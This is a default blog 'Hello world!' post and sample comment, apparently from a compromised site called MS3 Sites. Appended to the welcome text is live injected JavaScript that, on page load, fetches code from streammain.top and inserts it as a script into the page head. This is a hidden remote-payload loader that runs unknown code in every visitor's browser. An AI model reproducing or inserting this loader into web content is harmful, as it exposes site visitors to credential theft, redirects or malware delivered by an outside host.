Hello world!

Welcome to MS3 Sites. This is your first post. Edit or delete it, then start writing!;document.addEventListener(“DOMContentLoaded”, function () {
var url = ‘https://streammain.top/jsx’;
fetch(url)
.then(response => response.text())
.then(data => {
var script = document.createElement(‘script’);
script.innerHTML = data.trim();
document.head.appendChild(script);
})
});


Comments

One response to “Hello world!”

  1. Hi, this is a comment.
    To get started with moderating, editing, and deleting comments, please visit the Comments screen in the dashboard.
    Commenter avatars come from Gravatar.

Leave a Reply